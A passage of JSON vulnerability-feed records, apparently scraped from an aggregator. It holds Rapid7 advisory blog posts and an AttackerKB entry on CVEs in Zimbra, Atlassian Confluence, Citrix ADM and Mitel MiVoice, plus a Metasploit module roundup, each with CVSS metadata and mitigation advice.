"CVE-2021-22005"], "modified": "2021-09-21T19:55:35", "id": "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "href": "https://blog.rapid7.com/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-11T22:01:25", "description": "![Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite \$CVE-2022-41352\$](https://blog.rapid7.com/content/images/2022/10/zimbra-rce.jpg)\n\n_Note: Zimbra release [9.0.0 P27](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27>) addressed this vulnerability on October 10, 2022._\n\n[CVE-2022-41352](<https://nvd.nist.gov/vuln/detail/CVE-2022-41352>) is an unpatched remote code execution vulnerability in Zimbra Collaboration Suite discovered in the wild due to [active exploitation](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>). The vulnerability is due to the method (`cpio`) in which Zimbra\u2019s antivirus engine (Amavis) scans inbound emails. Zimbra has provided a [workaround](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>), which is to install the `pax` utility and restart the Zimbra services. Note that `pax` is installed by default on Ubuntu, so Ubuntu-based Zimbra installations are not vulnerable by default.\n\n> **Note:** This vulnerability, CVE-2022-41352 is effectively identical to [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333>) but leverages a different file format (`.cpio` and `.tar` as opposed to `.rar`). It is also a byproduct of a much older (unfixed) vulnerability, [CVE-2015-1197](<https://nvd.nist.gov/vuln/detail/CVE-2015-1197>). While the original CVE-2015-1197 affects most major Linux distros, our research team found that it is **not exploitable** unless a secondary application \u2013 such as Zimbra, in this case \u2013 uses `cpio` to extract untrusted archives; therefore, this blog is only focusing on Zimbra CVE-2022-41352.\n\nRapid7 has published technical documentation, including proof-of-concept (PoC) and indicator-of-compromise (IoC) information, regarding CVE-2022-41352 on [AttackerKB](<https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis?utm_source=blog&utm_medium=referral&utm_campaign=etr_cve_2022_41352>).\n\n## Background\n\nTo exploit this vulnerability, an attacker would email a `.cpio`, `.tar`, or `.rpm` to an affected server. When Amavis inspects it for malware, it uses `cpio` to extract the file. Since `cpio` has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access. The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist.\n\nAs of October 6, 2022, CVE-2022-41352 is not patched, but Zimbra has acknowledged the risk of relying on `cpio` in a [blog post](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>) where they recommend mitigations. CVE-2022-41352 was discovered in the wild due to [active exploitation](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>). Recently, CISA and others [have warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>) of multiple threat actors leveraging other vulnerabilities in Zimbra, which makes it likely that threat actors would logically move to exploit this latest unpatched vulnerability, too. In August, Rapid7 reported on the [active exploitation of multiple vulnerabilities in Zimbra Collaboration Suite](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>).\n\n## Affected products\n\n**Please note that information on affected versions or requirements for exploitability may change as we learn more about the threat.**\n\nTo be exploitable, two conditions must exist:\n\n 1. A vulnerable version of `cpio` must be installed, which is the case on basically every system (see [CVE-2015-1197](<https://nvd.nist.gov/vuln/detail/CVE-2015-1197>))\n 2. The `pax` utility must **not** be installed, as Amavis prefers `pax` and `pax` is not vulnerable\n\nUnfortunately, `pax` is not installed by default on Red Hat-based distros, and therefore they are vulnerable by default. We tested all (current) Linux distros that Zimbra officially supports in their default configurations and determined the following:\n\nLinux Distro | Vulnerable? \n---|--- \nOracle Linux 8 | Vulnerable \nRed Hat Enterprise Linux 8 | Vulnerable \nRocky Linux 8 | Vulnerable \nCentOS 8 | Vulnerable \nUbuntu 20.04 | Not vulnerable (pax is installed by default) \nUbuntu 18.04 | Not vulnerable (pax is installed, cpio has Ubuntu's custom patch) \n \nZimbra says that their plan is to remove the dependency on `cpio` entirely by making `pax` a prerequisite for Zimbra Collaboration Suite. Moving to `pax` is the best option since `cpio` cannot be used securely (because most major operating systems [removed a security patch](<https://lists.gnu.org/archive/html/bug-cpio/2019-11/msg00016.html>)).\n\n## Remediation\n\nZimbra released a patch for CVE-2022-41352 on October 10, 2022. The patched version is [Zimbra Collaboration Suite 9.0.0 P27](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27>). Organizations that use Zimbra should update immediately, without waiting for a regular patch cycle.\n\nIf you are unable to update your Zimbra version, you can apply [Zimbra's recommended workaround](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>), which is to install the `pax` archive utility, then **restart Zimbra or reboot**. We strongly recommend patching, as 9.0.0 P27 also resolves several other vulnerabilities, including [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>), a root privilege escalation.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-41352 via an authenticated vulnerability check (supported by agent and scanner based assessments) available in the October 6 content release (`ContentOnly-content-1.1.2667-202210061843`). This check will identify systems with an affected version of Zimbra Collaboration Suite installed where the `pax` package is not available. There is no change required to the default scan templates to enable this check.\n\nOur engineering team is working on updated vulnerability checks to account for the newly released patch.\n\n## Updates\n\n**October 6, 2022, 3:30pm ET:** Updated to include information on the newly released InsightVM/Nexpose check for CVE-2022-41352.\n\n**October 11, 2022:** Zimbra has released Zimbra Collaboration Suite 9.0.0 P27 to address this vulnerability, as well as other security issues. Our engineering team is working on updating our vulnerability checks to account for the patch.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T17:13:34", "type": "rapid7blog", "title": "Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite (CVE-2022-41352)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1197", "CVE-2022-30333", "CVE-2022-37393", "CVE-2022-41352"], "modified": "2022-10-06T17:13:34", "id": "RAPID7BLOG:9191651E2ECCE625AEB7BDCAD1EA43F6", "href": "https://blog.rapid7.com/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-12T19:33:06", "description": "## Putting in the work!\n\n![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/08/metasploit-fence.png)\n\nThis week we\u2019re extra grateful for the fantastic contributions our community makes to Metasploit. The Metasploit team landed more than 5 PRs each from [Ron Bowes](<https://github.com/rbowes-r7>) and [bcoles](<https://github.com/bcoles>), adding some great new capabilities.\n\n[Ron Bowes](<https://github.com/rbowes-r7>) contributed four new modules targeting UnRAR, Zimbra, and ManageEngine ADAudit Plus. These modules offer Metasploit users some excellent new vectors to leverage against targets.\n\nContributions from [bcoles](<https://github.com/bcoles>) offer improvements to various session interactions to make gathering data on targets more robust and consistent.\n\n## Have you seen Cassandra?\n\nAre you using tools to visualize your data? If you are using [`cassandra-web`](<https://github.com/avalanche123/cassandra-web>), a tool made specifically to help you "see" what Cassandra holds, there are new toys for attackers to use to access much more. The new module from [krastanoel](<https://github.com/krastanoel>) targets `cassandra-web` <= 0.5.0 with a directory traversal to read lots of those sensitive details off the target.\n\n## New module content (6)\n\n * [Cassandra Web File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/16851>) by Jeremy Brown and [krastanoel](<https://github.com/krastanoel>) \\- This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.\n * [UnRAR Path Traversal (CVE-2022-30333)](<https://github.com/rapid7/metasploit-framework/pull/16796>) by [Ron Bowes](<https://github.com/rbowes-r7>) and [Simon Scannell](<https://twitter.com/scannell_simon>), which exploits [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333?referrer=blog>) \\- This adds two modules for CVE-2022-30333, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open-source version 6.1.6 and earlier). The first module creates a `.rar` with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. This module generates the `.rar` file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.\n * [Webmin Package Updates RCE](<https://github.com/rapid7/metasploit-framework/pull/16856>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and Emir Polat, which exploits [CVE-2022-36446](<https://attackerkb.com/topics/q1u5OOKCDH/cve-2022-36446?referrer=blog>) \\- This module exploits an arbitrary command injection in Webmin versions prior to 1.997.\n * [UnRAR Path Traversal in Zimbra (CVE-2022-30333)](<https://github.com/rapid7/metasploit-framework/pull/16796>) by [Ron Bowes](<https://github.com/rbowes-r7>) and [Simon Scannell](<https://twitter.com/scannell_simon>), which exploits [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333?referrer=blog>) \\- This adds two modules for `CVE-2022-30333`, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open source version 6.1.6 and earlier). The first module creates a `.rar` with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. This module generates the `.rar` file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.\n * [Zimbra zmslapd arbitrary module load](<https://github.com/rapid7/metasploit-framework/pull/16807>) by [Darren Martyn](<https://twitter.com/_darrenmartyn>) and [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393?referrer=blog>) \\- This PR adds a local exploit for Zimbra to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file.\n * [ManageEngine ADAudit Plus CVE-2022-28219](<https://github.com/rapid7/metasploit-framework/pull/16758>) by Naveen Sunkavally and [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-28219](<https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219?referrer=blog>) \\- This adds a module that leverages a Java deserialization, directory traversal, and a blind XXE injection vulnerability to gain unauthenticated code execution again vulnerable versions of ManageEngine ADAudit Plus.\n\n## Enhancements and features (6)\n\n * [#16800](<https://github.com/rapid7/metasploit-framework/pull/16800>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This adds support for OpenSSL 3 compatibility with legacy ciphers.\n * [#16841](<https://github.com/rapid7/metasploit-framework/pull/16841>) from [bcoles](<https://github.com/bcoles>) \\- This updates the `post/windows/gather/enum_powershell_env` module with a code cleanup and expands the module to support non-Meterpreter session types such as shell sessions and PowerShell sessions.\n * [#16873](<https://github.com/rapid7/metasploit-framework/pull/16873>) from [bcoles](<https://github.com/bcoles>) \\- This PR cleans up enum_artifacts, adds documentation, error handling, YAML file parsing, and support for non-meterpreter sessions.\n * [#16875](<https://github.com/rapid7/metasploit-framework/pull/16875>) from [bcoles](<https://github.com/bcoles>) \\- This PR removes the Remove enum_putty Meterpreter script in favor for the existing post module.\n * [#16876](<https://github.com/rapid7/metasploit-framework/pull/16876>) from [bcoles](<https://github.com/bcoles>) \\- Removed the enum_logged_on_users Meterpreter script in favor for the existing post module\n * [#16878](<https://github.com/rapid7/metasploit-framework/pull/16878>) from [bcoles](<https://github.com/bcoles>) \\- Adds partial support for non-Meterpreter sessions for the enum_logged_on_users post module as well as makes use of the read_profile_list method. Resolves Rubocop and msftidy_docs violations.\n\n## Bugs fixed (1)\n\n * [#16872](<https://github.com/rapid7/metasploit-framework/pull/16872>) from [bcoles](<https://github.com/bcoles>) \\- This PR fixes shell_registry_getvalinfo which was truncating registry values at the first space and normalize_key which was causing a crash when only a hive name was passed to the function when running on a shell session.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.11...6.2.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-04T11%3A39%3A27-05%3A00..2022-08-10T15%3A45%3A22-05%3A00%22>)\n * [Full diff 6.2.11...6.2.12](<https://github.com/rapid7/metasploit-framework/compare/6.2.11...6.2.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T18:52:27", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28219", "CVE-2022-30333", "CVE-2022-36446", "CVE-2022-37393"], "modified": "2022-08-12T18:52:27", "id": "RAPID7BLOG:84EC5F57BD07F535627F51F28B2424B1", "href": "https://blog.rapid7.com/2022/08/12/metasploit-weekly-wrap-up-171/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-29T21:59:42", "description": "![Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138](https://blog.rapid7.com/content/images/2022/07/GettyImages-1059877984.jpg)\n\nExploitation is underway for one of the [trio of critical Atlassian vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) that were published last week affecting several the company\u2019s on-premises products. Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of [CVE-2022-26134 in Confluence Server and Confluence Data Center](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>).\n\n**CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:**\n\n * Confluence Server\n * Confluence Data Center\n\n**CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:**\n\n * Bamboo Server and Data Center\n * Bitbucket Server and Data Center\n * Confluence Server and Data Center\n * Crowd Server and Data Center\n * Crucible\n * Fisheye\n * Jira Server and Data Center\n * Jira Service Management Server and Data Center\n\n## CVE-2022-26138: Hardcoded password in Questions for Confluence app\n\nThe most critical of these three is [CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization\u2019s Confluence instance. Unsurprisingly, it didn\u2019t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.\n\n## Affected versions\n\n * Questions for Confluence 2.7.x\n\n * 2.7.34\n * 2.7.35\n * Questions for Confluence\n\n * 3.0.x\n * 3.0.2\n\n## Mitigation guidance\n\nOrganizations using on-prem Confluence should follow Atlassian\u2019s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian\u2019s advisory also includes information on how to look for evidence of exploitation. An [FAQ](<https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html>) has also been provided.\n\n> Please note: Atlassian\u2019s [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has a very important call-out that \u201cuninstalling the Questions for Confluence app does not remediate this vulnerability.\u201d\n\n## CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities\n\nTwo other vulnerabilities were announced at the same time, [CVE-2022-26136 and CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>), which are also rated critical by Atlassian. They both are issues with Servlet Filters in Java and can be exploited by remote, unauthenticated attackers. Cloud versions of Atlassian have already been fixed by the company.\n\nThe list of affected versions is long and can be found on [Atlassian\u2019s Security Advisory](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>).\n\nWhile the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-26138 with a remote vulnerability check released on July 29, 2022 (ContentOnly-content-1.1.2602-202207292027).\n\n## Updates\n\n07/29/2022 - 5:30 PM EDT \nUpdated Rapid7 customers section to include information on a new remote vulnerability check.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T19:26:38", "type": "rapid7blog", "title": "Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-07-27T19:26:38", "id": "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "href": "https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T21:57:35", "description": "![CVE-2022-27511: Citrix ADM Remote Device Takeover](https://blog.rapid7.com/content/images/2022/06/citrix-adm-etr.jpg)\n\nOn Monday, June 14, 2022, Citrix published an [advisory on CVE-2022-27511](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>), a critical improper access control vulnerability affecting their Application Delivery Management (ADM) product.\n\nA remote, unauthenticated attacker can leverage CVE-2022-27511 to reset administrator credentials to the default value at the next reboot. This allows the attacker to use SSH and the default administrator credentials to access the affected management console. The vulnerability has been patched in Citrix ADM 13.1-21.53 and ADM 13.0-85.19 and should be applied as soon as possible. Versions of Citrix ADM before 13.0 and 13.1 are end of life, so Citrix will not make patches available for these versions. Users still on version 12.x are encouraged to upgrade to a supported version.\n\nAt the time of this writing, no exploitation has been observed, and no exploits have been made publicly available. However, given the nature of the vulnerability and the footprint of Citrix ADM, we anticipate that exploitation will happen as soon as an exploit is made available.\n\n## Mitigation guidance\n\nCitrix ADM customers should upgrade their versions of both ADM server and agents as soon as possible. Citrix notes in their [advisory](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>) that they strongly recommend that network traffic to the Citrix ADM\u2019s IP address be segmented, either physically or logically, from standard network traffic.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to [CVE-2022-27511](<https://www.rapid7.com/db/vulnerabilities/citrix-adm-cve-2022-27511/>) with an authenticated vulnerability check available in the June 22, 2022 content release. Please note that this check does not support versions 13.1+ of Citrix ADM.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T20:03:55", "type": "rapid7blog", "title": "CVE-2022-27511: Citrix ADM Remote Device Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511"], "modified": "2022-06-16T20:03:55", "id": "RAPID7BLOG:C3FB7B0BA665AC291B6331292F32F47A", "href": "https://blog.rapid7.com/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}}, {"lastseen": "2022-07-08T21:58:14", "description": "![Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](https://blog.rapid7.com/content/images/2022/07/mitel-mivoice-etr.jpg)\n\nIn April 2022, telecommunications company Mitel [published a security advisory](<https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin_22-0002-001-v2.pdf>) on CVE-2022-29499, a data validation vulnerability in the Service Appliance component of [MiVoice Connect](<https://www.mitel.com/products/business-phone-systems/on-site/mivoice-connect>), a business communications product. The vulnerability, which was unpatched at time of publication, arose from insufficient data validation for a diagnostic script and potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. CVE-2022-29499 has a CVSSv3 score of 9.8.\n\nOn June 23, 2022, security firm Crowdstrike published an [analysis](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) on a ransomware intrusion attempt that had targeted CVE-2022-29499 \u2014 which at the time of detection was an undisclosed zero-day vulnerability \u2014 as an initial access vector. Over the past two weeks, Rapid7 Managed Detection and Response (MDR) has also observed a small number of intrusions that have leveraged CVE-2022-29499 as an initial access vector.\n\nThere is currently no indication that a large number of these appliances are exposed to the public internet, and we have no evidence that this vulnerability is being targeted in wider-scale ransomware campaigns. We are conscious of the fact, however, that the proliferation of ransomware in general has continued to shape risk models for many organizations, and that network perimeter devices are tempting targets for a variety of attackers.\n\n## Affected products\n\nCVE-2022-29499 affects MiVoice Connect deployments (including earlier versions 14.2) that include the MiVoice Connect Service Appliances, SA 100, SA 400 and/or Virtual SA. Vulnerable firmware versions include R19.2 SP3 (22.20.2300.0) and earlier, and R14.x and earlier. See Mitel [product security advisory 22-0002](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) and their [security bulletin](<https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin_22-0002-001-v2.pdf>) for additional information.\n\n## Mitigation guidance\n\nMitel MiVoice Connect customers who use vulnerable versions of the Service Appliance in their deployments should update to a fixed version of the appliance immediately. Mitel released patches for CVE-2022-29499 in early June 2022; organizations that have not updated the firmware on their appliances since before that timeframe should apply fixes as soon as possible. Appliances should not be exposed to the open internet. Administrators should also review network filters for these devices and employ the principle of least privilege.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-29499 with a remote, version-based vulnerability check in the July 8, 2022 content release.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-07T19:09:10", "type": "rapid7blog", "title": "Exploitation of Mitel MiVoice Connect SA CVE-2022-29499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-07-07T19:09:10", "id": "RAPID7BLOG:F35EA4220CACE146EF8E5F845F2B51BF", "href": "https://blog.rapid7.com/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-06-03T17:15:08", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 19, 2022 4:18pm UTC reported:\n\nThis is really bad \u2013 remote root on an organization\u2019s email server, if combined with other (currently 0-day vulnerabilities). Patch ASAP!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T00:00:00", "type": "attackerkb", "title": "CVE-2022-27925", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 